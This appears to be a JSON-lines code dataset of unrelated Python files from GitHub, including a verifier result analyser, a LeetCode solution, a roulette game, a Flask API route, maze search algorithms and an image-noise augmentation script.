AnalyserBase import AnalyserBaseClass\nimport functools\nimport logging\nimport os\nimport re\nimport yaml\n\n_logger = logging.getLogger(__name__)\n\nclass SymbooglixAnalyser(AnalyserBaseClass):\n def __init__(self, resultDict):\n super(SymbooglixAnalyser, self).__init__(resultDict)\n assert 'backend_timeout' in self._resultDict\n assert 'sbx_dir' in self._resultDict\n # FIXME: Remove this!\n assert '__soft_timeout' in self._resultDict\n assert 'total_time' in self._resultDict\n\n @property\n def foundBug(self):\n if self.hitHardTimeout:\n # FIXME: We need to examine the output to see what happened\n _logger.error('FIXME: Need to examine symbooglix\\'s working dir')\n return None\n\n # Use Symbooglix exitCode:\n if self.exitCode == 2 or self.exitCode == 4:\n return True\n elif self.exitCode == 0 or self.exitCode == 3 or self.exitCode == 9 or self.exitCode == 10:\n # NO_ERRORS_NO_TIMEOUT_BUT_FOUND_SPECULATIVE_PATHS : 9\n # NO_ERRORS_NO_TIMEOUT_BUT_HIT_BOUND : 10\n return False\n else:\n return None\n\n @property\n def failed(self):\n if self.ranOutOfMemory:\n return True\n\n if self.ranOutOfTime:\n return False # Timeout is not a failure\n\n # NO_ERRORS_NO_TIMEOUT_BUT_FOUND_SPECULATIVE_PATHS : 9\n # NO_ERRORS_NO_TIMEOUT_BUT_HIT_BOUND : 10\n if self.exitCode ==9:\n # We don't want to hit speculative paths\n return True\n if self.exitCode == 10:\n return False\n\n # All exit codes above 4 indicate something went badly wrong\n return self.exitCode > 4 or self.exitCode == 1\n\n # Override normal implementation\n @property\n def ranOutOfTime(self):\n if self.hitHardTimeout:\n return True\n\n if self.exitCode == 3 or self.exitCode == 4:\n # NO_ERRORS_TIMEOUT,\n # ERRORS_TIMEOUT,\n return True\n\n # FIXME: This hack will waste space in the results. We should\n # find a better way to check this\n # Check if the soft timeout was hit\n if self._resultDict['total_time'] > self.softTimeout:\n return True\n\n return False\n\n @property\n def hitBound(self):\n return self.exitCode == 10\n\n @property\n def foundSpeculativePathsAndNoBug(self):\n return self.exitCode == 9\n\n @property\n def hitHardTimeout(self):\n return self._resultDict['backend_timeout']\n\n # FIXME: Remove this!\n @property\n def softTimeout(self):\n return self._resultDict['__soft_timeout']\n\n def getAnalysesDict(self):\n results = super(SymbooglixAnalyser, self).getAnalysesDict()\n results['bound_hit'] = self.hitBound\n results['speculative_paths_nb'] = self.foundSpeculativePathsAndNoBug\n results['instructions_executed'] = self.instructionsExecuted\n return results\n\n def _getSbxWorkDir(self):\n sbxDir = self._resultDict['sbx_dir']\n if not os.path.exists(sbxDir):\n _logger.error('{} does not exist'.format(sbxDir))\n return None\n return sbxDir\n\n @property\n def instructionsExecuted(self):\n executorInfo = self.getExecutorInfo()\n if executorInfo == None:\n return None\n\n try:\n return executorInfo['instructions_executed']\n except KeyError as e:\n _logger.error(str(e))\n return None\n\n @functools.lru_cache(maxsize=1)\n def getExecutorInfo(self):\n sbxDir = self._getSbxWorkDir()\n if sbxDir == None:\n return None\n\n executorYamlPath = os.path.join(sbxDir, 'executor_info.yml')\n if not os.path.exists(executorYamlPath):\n _logger.error('{} does not exist'.format(executorYamlPath))\n return None\n\n data = None\n try:\n with open(executorYamlPath, 'r') as f:\n data = yaml.load(f)\n return data\n except Exception as e:\n _logger.error(str(e))\n return None\n\ndef get():\n return 
SymbooglixAnalyser\n","repo_name":"symbooglix/boogie-runner","sub_path":"BoogieRunner/Analysers/Symbooglix.py","file_name":"Symbooglix.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1612796047","text":"class Solution:\n    def hammingDistance(self, x: int, y: int) -> int:\n        xor = x ^ y\n        d = 0\n        \n        # method 1: remove the rightmost bit of '1'\n        while xor:\n            d += 1\n            xor = xor & (xor - 1) \n        \n        # method 2: rightmost bit is 1 or not\n        # while xor:\n        #     if xor & 1:\n        #         d += 1\n        #     xor = xor >> 1\n        \n        return d\n    \n    \n    # bit operation called XOR which outputs 1 if and only if the input bits are different.\n    return bin(x^y).count('1')\n    \n    \n    \"\"\"\n    bitwise operation\n    - rightmost bit: check if the rightmost bit is one, for which we can use either the modulo operation (i.e. i % 2) or the bit AND operation (i.e. i & 1). Both operations would mask out the rest of the bits other than the rightmost bit.\n    - logical shift: \n    \"\"\"","repo_name":"cindyyj/leetcode_solutions","sub_path":"461-hamming-distance/461-hamming-distance.py","file_name":"461-hamming-distance.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5684928807","text":"import random\nfrom ponavljackiError import ponavljackiError\n\nclass Rulet:\n    def __init__(self):\n        self.computer_choice = 0\n        self.computer_number = 0\n        self.player_input = 0\n        self.player_number = 0\n        self.ulog = 100\n        self.boja = [\"crvena\", \"crna\"]\n        \n\n\n    def display_title_bar(self):\n        print(\"\\t~~~~~~~~~~~~~~~~~~~~\")\n        print(\"\\t~~~ Casino Rulet ~~~\")\n        print(\"\\t~~~~~~~~~~~~~~~~~~~~\")\n\n    def get_user_choice(self):\n        print(\"\\t[1] Igraj Rulet.\")\n        print(\"\\t[x] Izlaz.\")\n\n        return input(\"Odaberite što želite napraviti? \")\n    \n    def tip_kladenja(self):\n        print(\"[1] pogađanje broja\")\n        print(\"[2] pogađanje boje\")\n\n        return input(\"Odaberite tip klađenja: \")\n    \n\n    def start_game(self):\n\n        self.ulog = 100\n\n        if self.player_input > 100 or self.player_input < 0:\n            raise ponavljackiError (101)\n\n        while self.player_input <= 1:\n            self.player_input = int(input(\"Vaše trenutno stanje je {}. Odaberite iznos uloga: \".format(self.ulog)))\n\n        # zapamti iznos uloga prije nego što ga pregazi odabir boje\n        iznos = self.player_input\n\n        tip = self.tip_kladenja()\n        \n        while tip == '1':\n            self.computer_choice = random.randrange (0,36)\n            self.player_input = int(input(\"Odaberi broj između 1 i 36: \"))\n\n            if self.player_input == self.computer_choice: \n                self.ulog += self.player_input * 20\n                print(\"Vaš ulog se povećao. Trenutno stanje je {}\".format(self.ulog))\n            elif self.player_input != self.computer_choice:\n                self.ulog -= self.player_input\n                print(\"Vaš ulog se smanjio. Trenutno stanje je {}\".format(self.ulog))\n            else:\n                raise ponavljackiError (101)\n            \n            return self.tip_kladenja()\n\n        while tip == '2':\n\n            while True:\n                \n                self.player_input = input(\"Želite li odabrati crvenu ili crnu? \".format(self.boja)).lower()\n                self.computer_choice = random.choice (self.boja)\n\n                if self.player_input == self.computer_choice:\n                    self.ulog += iznos * 2\n                    print(\"Pogodili ste boju! Vaš ulog se povećao na {}\".format(self.ulog)) \n                elif self.computer_choice != self.player_input:\n                    self.ulog -= iznos\n                    print(\"Niste pogodili boju! Vaš ulog se smanjio na {}\".format(self.ulog))\n                else: \n                    print (\"HVATANJE IZUZETAKA!\")\n                \n                return self.tip_kladenja()\n\n        if self.ulog <= 0 or self.ulog >= 5000:\n            print(\"Kraj igre! 
Došli ste do kraja limita!\")\n break\n \n\n def play(self):\n choice = ''\n self.display_title_bar()\n while choice != 'x':\n choice = self.get_user_choice()\n self.display_title_bar()\n if choice == '1':\n self.start_game()\n elif choice == '2':\n self.start_game()\n elif choice == 'x':\n print(\"Hvala što ste igrali. Vidimo se opet!!! :)\")\n else:\n raise ponavljackiError (000)\n\n\nif __name__ == '__main__':\n game = Rulet ()\n game.play()\n\n","repo_name":"andreastarcevic/Vjezba-za-kolokvij-1","sub_path":"ponavljacki.py","file_name":"ponavljacki.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30202323254","text":"from datetime import datetime\nfrom http import HTTPStatus\n\nfrom flask import jsonify, request\nfrom flask_cors import cross_origin\n\nfrom legal_api.models import Business, PartyRole\nfrom legal_api.services import authorized\nfrom legal_api.utils.auth import jwt\n\nfrom .bp import bp\n\n\n@bp.route('//parties', methods=['GET', 'OPTIONS'])\n@bp.route('//parties/', methods=['GET', 'OPTIONS'])\n@cross_origin(origin='*')\n@jwt.requires_auth\ndef get_parties(identifier, party_id=None):\n \"\"\"Return a JSON of the parties.\"\"\"\n business = Business.find_by_identifier(identifier)\n\n if not business:\n return jsonify({'message': f'{identifier} not found'}), HTTPStatus.NOT_FOUND\n\n # check authorization\n if not authorized(identifier, jwt, action=['view']):\n return jsonify({'message':\n f'You are not authorized to view parties for {identifier}.'}), \\\n HTTPStatus.UNAUTHORIZED\n\n if party_id:\n party_roles = PartyRole.get_party_roles_by_party_id(business.id, party_id)\n if not party_roles:\n return jsonify({'message': f'Party {party_id} not found'}), HTTPStatus.NOT_FOUND\n else:\n end_date = datetime.utcnow().strptime(request.args.get('date'), '%Y-%m-%d').date() \\\n if request.args.get('date') else datetime.utcnow().date()\n party_roles = PartyRole.get_party_roles(business.id, end_date, request.args.get('role'))\n\n party_role_dict = {}\n party_list = []\n for party_role in party_roles:\n party_role_json = party_role.json\n party_role_dict.setdefault(party_role.party_id, []).append(\n {'roleType': party_role_json['role'].replace('_', ' ').title(),\n 'appointmentDate': party_role_json['appointmentDate'],\n 'cessationDate': party_role_json['cessationDate']})\n for key, value in party_role_dict.items():\n party = [x for x in party_roles if x.party_id == key][0]\n party_json = party.json\n del party_json['role']\n del party_json['appointmentDate']\n del party_json['cessationDate']\n party_json['roles'] = value\n party_list.append(party_json)\n\n if party_id:\n return {'party': party_list[0]}\n else:\n return jsonify(parties=party_list)\n","repo_name":"bcgov/lear","sub_path":"legal-api/src/legal_api/resources/v2/business/business_parties.py","file_name":"business_parties.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"30623184512","text":"from contextlib import contextmanager\nfrom dogapi import dog_stats_api\nimport json\nimport logging\nimport requests\nfrom django.conf import settings\nfrom time import time\nfrom uuid import uuid4\nfrom django.utils.translation import get_language\n\nlog = logging.getLogger(__name__)\n\n\ndef strip_none(dic):\n return dict([(k, v) for k, v in dic.iteritems() if v is not None])\n\n\ndef strip_blank(dic):\n def _is_blank(v):\n 
return isinstance(v, str) and len(v.strip()) == 0\n return dict([(k, v) for k, v in dic.iteritems() if not _is_blank(v)])\n\n\ndef extract(dic, keys):\n if isinstance(keys, str):\n return strip_none({keys: dic.get(keys)})\n else:\n return strip_none({k: dic.get(k) for k in keys})\n\n\ndef merge_dict(dic1, dic2):\n return dict(dic1.items() + dic2.items())\n\n\n@contextmanager\ndef request_timer(request_id, method, url):\n start = time()\n yield\n end = time()\n duration = end - start\n dog_stats_api.histogram('comment_client.request.time', duration, end)\n log.info(\n \"comment_client_request_log: request_id={request_id}, method={method}, \"\n \"url={url}, duration={duration}\".format(\n request_id=request_id,\n method=method,\n url=url,\n duration=duration\n )\n )\n\n\ndef perform_request(method, url, data_or_params=None, *args, **kwargs):\n if data_or_params is None:\n data_or_params = {}\n headers = {\n 'X-Edx-Api-Key': getattr(settings, \"COMMENTS_SERVICE_KEY\", None),\n 'Accept-Language': get_language(),\n }\n request_id = uuid4()\n request_id_dict = {'request_id': request_id}\n\n if method in ['post', 'put', 'patch']:\n data = data_or_params\n params = request_id_dict\n else:\n data = None\n params = merge_dict(data_or_params, request_id_dict)\n with request_timer(request_id, method, url):\n response = requests.request(\n method,\n url,\n data=data,\n params=params,\n headers=headers,\n timeout=5\n )\n\n if 200 < response.status_code < 500:\n raise CommentClientRequestError(response.text, response.status_code)\n # Heroku returns a 503 when an application is in maintenance mode\n elif response.status_code == 503:\n raise CommentClientMaintenanceError(response.text)\n elif response.status_code == 500:\n raise CommentClient500Error(response.text)\n else:\n if kwargs.get(\"raw\", False):\n return response.text\n else:\n return json.loads(response.text)\n\n\nclass CommentClientError(Exception):\n def __init__(self, msg):\n self.message = msg\n\n def __str__(self):\n return repr(self.message)\n\n\nclass CommentClientRequestError(CommentClientError):\n def __init__(self, msg, status_code=400):\n super(CommentClientRequestError, self).__init__(msg)\n self.status_code = status_code\n\n\nclass CommentClient500Error(CommentClientError):\n pass\n\n\nclass CommentClientMaintenanceError(CommentClientError):\n pass\n","repo_name":"XiaodunServerGroup/medicalmooc","sub_path":"lms/lib/comment_client/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21515395961","text":"\"\"\"\nThis is for practicing contents of searching problem\nin Classic Computer Science Problem in Python.\n\"\"\"\n\n## find path at maze\nfrom __future__ import annotations ## allow 'Optional[Node]' code\nfrom enum import Enum\nfrom heapq import heappop, heappush\nfrom math import sqrt\nimport random\nfrom collections import deque\nfrom typing import Callable, Deque, Dict, Generic, List, NamedTuple, Optional, Protocol, Set, TypeVar\n\n\nclass Cell(str, Enum):\n \"\"\"Represent status of each cell in maze\"\"\"\n EMPTY = \" \"\n BLOCKED = \"X\"\n START = \"S\"\n GOAL = \"G\"\n PATH = \"*\"\n\n\nclass MazeLocation(NamedTuple):\n \"\"\"Inherit NamedTuple?\n \n namedtuple example:\n \n from collections import namedtuple\n MazeLocation = namedtuple('MazeLocation', ['row', 'column'])\n \"\"\"\n \n row : int\n column : int\n\n\nclass Maze:\n def __init__(self,\n rows : int = 10,\n columns : int = 10,\n 
sparseness : float = 0.2,\n start : MazeLocation = MazeLocation(0, 0),\n goal : MazeLocation = MazeLocation(9, 9)\n ) -> None:\n \n self._rows = rows\n self._columns = columns\n self.start = start\n self.goal = goal\n \n self._grid: List[List[Cell]] = [[Cell.EMPTY for _ in range(columns)]\n for _ in range(rows)]\n \n self._randomly_fill(rows, columns, sparseness)\n \n self._grid[start.row][start.column] = Cell.START\n self._grid[goal.row][goal.column] = Cell.GOAL\n \n return \n \n def _randomly_fill(self,\n rows : int,\n columns : int,\n sparseness : float\n ) -> None:\n \n \"\"\"Fill Cell.BLOCKED at self._grid with some of sparseness\"\"\"\n \n for r in range(rows):\n for c in range(columns):\n if random.uniform(0, 1) < sparseness:\n self._grid[r][c] = Cell.BLOCKED\n \n return\n \n def __str__(self) -> str:\n \"\"\"Return string format of Maze instance\"\"\"\n \n output = ''\n for row in self._grid:\n output += \"\".join([item.value for item in row]) + '\\n'\n return output\n\n def goal_test(self, loc : MazeLocation) -> bool:\n return loc == self.goal\n \n def _blocked_test(self,\n row : int,\n column : int\n ) -> bool:\n \n return self._grid[row][column] == Cell.BLOCKED\n \n def _check_bound(self, row: int, column: int) -> bool:\n return row in range(self._rows) and column in range(self._columns)\n \n def successors(self,\n loc : MazeLocation\n ) -> List[MazeLocation]:\n\n \"\"\"Find all possible MazeLocation by List\"\"\"\n \n possible_locs = []\n if self._check_bound(loc.row + 1, loc.column) and \\\n not self._blocked_test(loc.row + 1, loc.column):\n possible_locs.append(MazeLocation(loc.row + 1, loc.column))\n \n if self._check_bound(loc.row - 1, loc.column) and \\\n not self._blocked_test(loc.row - 1, loc.column):\n possible_locs.append(MazeLocation(loc.row - 1, loc.column))\n \n if self._check_bound(loc.row, loc.column + 1) and \\\n not self._blocked_test(loc.row, loc.column + 1):\n possible_locs.append(MazeLocation(loc.row, loc.column + 1))\n \n if self._check_bound(loc.row, loc.column - 1) and \\\n not self._blocked_test(loc.row, loc.column - 1):\n possible_locs.append(MazeLocation(loc.row, loc.column - 1))\n \n return possible_locs\n \n def mark(self, path : List[MazeLocation]) -> None:\n \"\"\"mark '*' on path from input list\"\"\"\n \n for loc in path:\n self._grid[loc.row][loc.column] = Cell.PATH\n ## re-mark start, goal position\n self._grid[self.start.row][self.start.column] = Cell.START\n self._grid[self.goal.row][self.goal.column] = Cell.GOAL\n \n def clear(self, path : List[MazeLocation]) -> None:\n \"\"\"clear '*' marking on path\"\"\"\n \n for loc in path:\n self._grid[loc.row][loc.column] = Cell.EMPTY\n self._grid[self.start.row][self.start.column] = Cell.START\n self._grid[self.goal.row][self.goal.column] = Cell.GOAL\n\n\nT = TypeVar('T')\n\nclass Node(Generic[T]):\n def __init__(self,\n state: T,\n #parent: Optional['Node'],\n parent: Optional[Node],\n cost: float = 0.0,\n heuristic: float =0.0\n ) -> None:\n \n self.state = state\n self.parent = parent\n self.cost = cost\n self.heuristic = heuristic ## ??\n \n def __lt__(self, other: 'Node') -> bool:\n return (self.cost + self.heuristic) < (other.cost + other.heuristic)\n\n\nclass Stack(Generic[T]):\n \"\"\"Stack abstract data structure implemented by python list\"\"\"\n \n def __init__(self) -> None:\n self._container: List[T] = []\n \n @property\n def empty(self) -> bool:\n return not self._container\n\n def push(self, item: T) -> None:\n self._container.append(item)\n \n def pop(self) -> T:\n return 
self._container.pop()\n \n def __str__(self) -> str:\n return repr(self._container)\n \n\ndef dfs(\n initial : T,\n goal_test : Callable[[T], bool],\n successors : Callable[[T], List[T]]\n ) -> Optional[Node[T]]:\n \"\"\"Depth first search path from initial to goal\"\"\"\n \n frontier: Stack = Stack()\n explored: Set[T] = set()\n \n ## start to search path\n frontier.push(Node(initial, None))\n explored.add(initial)\n \n while not frontier.empty:\n current_node = frontier.pop()\n current_state = current_node.state\n if goal_test(current_state):\n return current_node\n for child in successors(current_state):\n if child not in explored:\n child_node = Node(child, current_node)\n frontier.push(child_node)\n explored.add(child)\n return None ## could not find goal\n\ndef node_to_path(node: Node[T]) -> List[T]:\n \"\"\"transform node connection info to list\"\"\"\n \n path: List[T] = []\n curr = node\n while curr:\n path.append(curr.state)\n curr = curr.parent\n path.reverse()\n return path\n\n\nclass Queue(Generic[T]):\n def __init__(self) -> None:\n self._container: Deque[T] = deque()\n \n @property\n def empty(self) -> bool:\n return not self._container\n \n def push(self, item: T) -> None:\n self._container.append(item)\n \n def pop(self) -> T:\n return self._container.popleft()\n \n def __repr__(self) -> str:\n return repr(self._container)\n\n\ndef bfs(\n initial : T,\n goal_test : Callable[[T], bool],\n successors : Callable[[T], List[T]]\n ) -> Optional[Node[T]]:\n \"\"\"Breadth first search path from initial to goal\"\"\"\n \n frontier: Queue[Node[T]] = Queue()\n explored: Set[T] = set()\n \n ## start bfs\n frontier.push(Node(initial, None))\n explored.add(initial)\n \n while not frontier.empty:\n current_node = frontier.pop()\n current_state = current_node.state\n if goal_test(current_state):\n return current_node\n for neighbor in successors(current_state):\n if neighbor not in explored:\n frontier.push(Node(neighbor, current_node))\n explored.add(neighbor)\n return None\n\n\nclass PriorityQueue(Generic[T]):\n def __init__(self) -> None:\n self._container: List[T] = []\n \n @property\n def empty(self) -> bool:\n return not self._container\n \n def push(self, item: T) -> None:\n heappush(self._container, item)\n \n def pop(self) -> T:\n return heappop(self._container)\n \n def __repr__(self) -> str:\n return repr(self._container)\n\n\ndef euclidean_distance(\n goal : MazeLocation\n ) -> Callable[[MazeLocation], float]:\n \"\"\"Return function which calculates euclidean distance\n between MazeLocation and goal\"\"\"\n def distance(ml : MazeLocation) -> float:\n \"\"\"Return euclidean distance btw input location and\n goal location\"\"\"\n xdist: int = ml.column - goal.column\n ydist: int = ml.row - goal.row\n return sqrt(xdist * xdist + ydist * ydist)\n return distance\n\ndef manhattan_distance(\n goal : MazeLocation\n ) -> Callable[[MazeLocation], float]:\n \"\"\"Return nested function which calculates\n manhattan distance from input location to goal location\"\"\"\n def distance(ml: MazeLocation) -> float:\n \"\"\"Return manhattan distance from inpu location to\n goal location\"\"\"\n xdist: int = abs(ml.column - goal.column)\n ydist: int = abs(ml.row - goal.row)\n return xdist + ydist\n return distance\n\ndef astar(\n initial : T,\n goal_test : Callable[[T], bool],\n successors : Callable[[T], List[T]],\n heuristic : Callable[[T], float]\n ) -> Optional[Node[T]]:\n \"\"\"A* algorithm for searching path\n\n Parameters\n ----------\n initial : T\n start location\n goal_test : 
Callable[[T], bool]\n function if T is goal location\n successors : Callable[[T], List[T]]\n function returns List of T (locations)\n heuristic : Callable[[T], float]\n function calculates heuristic estimates\n of remain distance\n\n Returns\n -------\n Optional[Node[T]]\n Node with goal location or None\n \"\"\"\n \n frontier: PriorityQueue[Node[T]] = PriorityQueue()\n frontier.push(Node(initial, None, 0.0, heuristic(initial)))\n \n explored: Dict[T, float] = {initial: 0.0}\n \n while not frontier.empty:\n current_node: Node[T] = frontier.pop()\n current_state: T = current_node.state\n if goal_test(current_state):\n return current_node\n \n for neighbor in successors(current_state):\n new_cost = current_node.cost + 1\n ## add or update neighbor's cost\n if neighbor not in explored or explored[neighbor] > new_cost:\n explored[neighbor] = new_cost \n frontier.push(Node(neighbor, current_node,\n new_cost, heuristic(neighbor)))\n return None","repo_name":"Beomman-Han/data-structure-and-algorithm","sub_path":"algorithm/classic_problem/ch2_search.py","file_name":"ch2_search.py","file_ext":"py","file_size_in_byte":10189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44642127442","text":"# -*- coding: utf-8 -*-\n\"\"\"\nEste módulo es el punto de entrada __main__ para la útilidad de comando.\n\"\"\"\nimport datetime\nimport enum\nimport click\n\nfrom . import conf\nfrom .core.wheater.job.watcher import WeatherWatcher\nfrom .core.wheater.statistics import coroutine as coro\nfrom .core.wheater.statistics.coroutine import WheaterStatsSumary\nfrom .core.galaxy.simulator import SpaceTime\n\nNOW = datetime.datetime.now()\n\nONE_HUMAN_YEAR = 365\nONE_VULCAN_YEAR = 72\nONE_BETASOIDE_YEAR = 120\nONE_FERENGI_YEAR = 360\n\n\ndef generate_entropy():\n click.clear()\n click.echo('| | | (_) | |')\n click.echo('| |__| |_ __| |')\n click.echo(\"| __ | |/ _` | '__/ _ \\ / _` |/ _ \\ '_ \\ / _ \")\n click.echo(\"| | | | | (_| | | | (_) | (_| | __/ | | | (_) |\")\n click.echo(\"|_| |_|_|\\__,_|_| \\___/ \\__, |\\___|_| |_|\\___(_)\")\n click.echo(\" __/ |\")\n click.echo(\" |___/\")\n\n\nclass CommandLineOption(enum.IntEnum):\n \"\"\"Lista de opciones de la app, línea de comandos.\n \"\"\"\n FORECASTING = 1\n INIT_WHEATER_JOB = 2\n\n\n@click.option('--generardatos', default=365*10)\ndef init_db():\n\n if conf.DATABASE_URL != conf.DEFAULT_DB: #wk. contratiempo.\n click.echo('Procesando datos...')\n\n # Creamos un object WheaterWatcher y le indicamos el número de lotes a envíar a db.\n watcher = WeatherWatcher(lot_size=conf.JOB_BATCHER)\n space_time = SpaceTime.galaxy(from_day=0, to_day=conf.JOB_WORK)\n\n with click.progressbar(space_time, length=conf.JOB_WORK) as stream:\n for stream_data in stream:\n watcher.analyze(stream_data)\n\n click.echo('done!')\n else:\n click.echo('!'*80)\n click.echo('\\n\\n Antes de continuar necesitas setear la variable de entorno HIDROGENO_DB con la '\n 'URL de la base de datos a usar')\n click.echo('\\n Para más información ver la documentación.\\n')\n click.echo('!' * 80)\n\ndef main():\n generate_entropy()\n\n opts = {\n CommandLineOption.FORECASTING: 'Pronóstico de Clima por Años. 
(simulación)',\n CommandLineOption.INIT_WHEATER_JOB: 'Volcar datos a bd con las condiciones climáticas de todos los días '\n '(utilizando \"JOB\" para calcularlas)'\n }\n click.echo('\\nSeleccione una opción:\\n')\n for opcion, descripcion in opts.items():\n click.echo('[{:d}] {:s}.'.format(opcion, descripcion))\n # mostrar opciones\n show_options()\n\n\n@click.command()\n@click.option('--option', default=1, prompt='Seleccione una opción:')\ndef show_options(option):\n \"\"\"Listado de opciones diponibles.\n \"\"\"\n if option == CommandLineOption.INIT_WHEATER_JOB.value:\n init_db()\n elif option == CommandLineOption.FORECASTING:\n forecast_wheater()\n else:\n click.echo('Debes seleccionar una opción')\n\n\n@click.command()\n@click.option('--years', default=10, prompt='Indique el número de años a predecir. Default (10):')\ndef forecast_wheater(years):\n\n days_to_calculate = 360 * years\n\n # llamammos subrutina, indicandole cuántos registros procesar antes de su cierre \"automático\".\n coro_stats = coro.listen_stream(days_to_calculate)\n\n try:\n\n click.echo('preparando simulación de {} años. {} días...'.format(years, days_to_calculate))\n\n # iniciamos \"simulación\" planetaria...partiendo del día Cero.\n data_space_stream = SpaceTime.galaxy(from_day=0, to_day=days_to_calculate)\n\n with click.progressbar(data_space_stream, length=days_to_calculate) as stream:\n\n for data in stream:\n # envíamos el (día, el clima, y el nivel de precipitación) para estadísticas.\n coro_stats.send(\n (data.day, data.wheater, data.precipitation)\n )\n\n except StopIteration as result:\n\n if isinstance(result.value, WheaterStatsSumary):\n\n # predicciones y datos estadísticos después de la \"simulación\"\n forecasting = result.value\n click.echo('*' * 100)\n\n # mostramos pronóstico del tiempo...\n click.echo(forecasting.periods_summary)\n click.echo(forecasting.pluviometer.summary)\n click.echo(forecasting.general_stats)\n else:\n raise\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nicolasmendoza/hidrogeno","sub_path":"hydrogen/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4356,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23297042001","text":"# -*- coding: utf-8 -*-\n# @project : Denoise-tensorflow\n# @Time : 2019-08-08 12:41 \n# @Author : ZhangXiao(sinceresky@foxmail.com)\n# @File : add_noisy_tool.py\n\nimport numpy as np\nimport cv2\nimport random\nimport os\n\nnoise_background_dir = 'noise/'\ntarget_w, target_h = 200, 120\n# target_w_all = 200\n\n\ndef get_noisy_ori(mat, size):\n sig = np.linspace(0, 50, size)\n np.random.shuffle(sig)\n\n # image = cv2.resize(mat, (180, 180), interpolation=cv2.INTER_CUBIC)\n image = mat[:min(mat.shape[0], target_h), :min(target_w, mat.shape[1])]\n # image = cv2.resize(image, (180, 180), interpolation=cv2.INTER_CUBIC)\n # _, bin = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n # 做一次归一化\n for y in range(image.shape[0]):\n for x in range(image.shape[1]):\n if image[y][x] != 255:\n image[y][x] = 0\n else:\n image[y][x] = 255\n\n # image = mat\n row, col = image.shape[0], image.shape[1]\n if len(image.shape) < 3:\n ch = 1\n image = image.reshape(row, col, ch)\n else:\n ch = image.shape[2]\n mean = 0\n if target_w != image.shape[1] or target_h != image.shape[0]:\n blank = np.full((target_h, target_w, ch), 255, dtype=np.uint8)\n y = int(abs((target_h - image.shape[0]) / 2) - 1)\n if y < 0:\n y = 0\n x = int(abs(target_w - image.shape[1]) / 2) - 1\n if x < 
0:\n x = 0\n blank[y:y+image.shape[0], x:x+image.shape[1]] = image\n image = blank\n # _, image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n # image = image.reshape(image.shape[0], image.shape[1], 1)\n use_background = False\n # cv2.imshow('do', image)\n if random.randint(0, 9) < 3:\n i = random.randint(0, size - 1)\n sigma = sig[i]\n gauss = np.random.normal(mean, sigma, (target_h, target_w, ch))\n gauss = gauss.reshape(target_h, target_w, ch)\n noisy = image + gauss\n noisy = np.clip(noisy, 0, 255)\n noisy = noisy.astype(np.uint8)\n else:\n noise_name = random.randint(1, 9)\n noise_mat = cv2.imread(os.path.join(noise_background_dir, str(noise_name) + '.png'), 0)\n noise_mat = cv2.resize(noise_mat, (target_w, target_h), interpolation=cv2.INTER_LANCZOS4)# w, h\n noise_mat = noise_mat.reshape((target_h, target_w, ch))\n for y in range(noise_mat.shape[0]):\n for x in range(noise_mat.shape[1]):\n if image[y][x] != 255:\n noise_mat[y][x] = image[y][x]\n noisy = noise_mat\n use_background = True\n\n # cv2.imshow('no', noisy)\n # if noisy.shape[2] != 1:\n # noisy = cv2.cvtColor(noisy, cv2.COLOR_BGR2GRAY)\n # if image.shape[2] != 1:\n # image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n random_num = random.randint(0, 9)\n if random_num < 3 or (use_background and random_num < 8):\n kernel_size = (3, 3)\n img_data_blur = cv2.GaussianBlur(noisy, kernel_size, 0.8)\n\n cv2.normalize(img_data_blur, img_data_blur, 0, 255, cv2.NORM_MINMAX)\n noisy = np.array(img_data_blur, dtype=np.uint8)\n if random.randint(0, 9) < 8:\n shape = noisy.shape\n noisy = cv2.resize(noisy, (int(shape[1] / 2), int(shape[0] / 2)), interpolation=cv2.INTER_LANCZOS4)\n noisy = cv2.resize(noisy, (shape[1], shape[0]), interpolation=cv2.INTER_LANCZOS4)\n noisy = noisy.reshape(shape)\n # print(noisy)\n # _, image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\n # for y in range(image.shape[0]):\n # for x in range(image.shape[1]):\n # if image[y][x] < 128:\n # image[y][x] = 0\n # else:\n # image[y][x] = 255\n return noisy, image\n # cv2.imwrite(os.path.join(save_dir, \"noisy/%04d.png\" % i), noisy)\n # cv2.imwrite(os.path.join(save_dir, \"original/%04d.png\" % i), image)","repo_name":"zhangxiao339/DeNoise-tensorflow","sub_path":"data_util/add_noisy_tool.py","file_name":"add_noisy_tool.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"22115664084","text":"from .. import settings\nfrom .. import utils\n\nimport os\nimport pathlib\n\nclass DataObjects(object):\n \"\"\"\n An object that manages the lazy loading of objects and their file dependencies\n \n Example usage:\n --------------\n \n import biu\n import pandas as pd\n\n file = biu.utils.Acquire().curl('https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data')\n data_objs = DataObjects(where='./', redo=False)\n data_objs.add_file(\"iris.tsv\", file)\n data_objs.register(\"iris\", [\"iris.tsv\"],\n lambda x: pd.read_csv(x[\"iris.tsv\"], index_col=False, names=['a','b','c','d','class']),\n docstring=\"An Pandas DataFrame of the IRIS data\")\n \n data_objs.iris\n data_objs.iris['e'] = data_objs.iris.a\n \"\"\"\n \n __slots__ = [ 'registered', 'files', 'local_files', 'loaded', 'where',\n 'download_where', 'redo', 